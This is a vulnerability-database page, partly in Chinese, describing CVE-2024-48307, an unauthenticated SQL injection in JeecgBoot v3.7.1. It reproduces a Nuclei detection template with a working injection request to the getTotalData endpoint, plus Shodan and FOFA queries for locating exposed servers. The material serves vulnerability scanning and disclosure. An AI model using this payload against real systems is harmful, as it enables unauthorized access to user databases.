CVE-2024-48307: JeecgBoot v3.7.1 - SQL Injection

日期: 2025-08-01 | 影响软件: JeecgBoot | POC: 已公开

漏洞描述

The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.

PoC代码[已公开]

id: CVE-2024-48307

info:
  name: JeecgBoot v3.7.1 - SQL Injection
  author: lbb,s4e-io
  severity: critical
  description: |
    The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
  remediation: |
    Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
    - https://github.com/jeecgboot/JeecgBoot/issues/7237
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-48307
    cwe-id: CWE-89
    epss-score: 0.89515
    epss-percentile: 0.99533
  metadata:
    max-request: 2
    vendor: jeecg
    product: jeecg_boot
    fofa-query:
      - icon_hash="-250963920"
      - icon_hash=1380908726
      - title="jeecg-boot"
    shodan-query: http.favicon.hash:"1380908726"
  tags: cve2024,cve,jeecg,sqli,vkev

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

    payloads:
      path:
        - /jeecg-boot/
        - /

    attack: batteringram
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502203e44e631fad9ad3b7cbfefab2a06b5405bd04ca15f4a7baba6130dfb34a7c8ff02210095cc2fea02bb22fc6f29730d34d8a9a4baab849eb7c1b125ff6a9bbd11c0f463:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-48307.yaml

相关漏洞推荐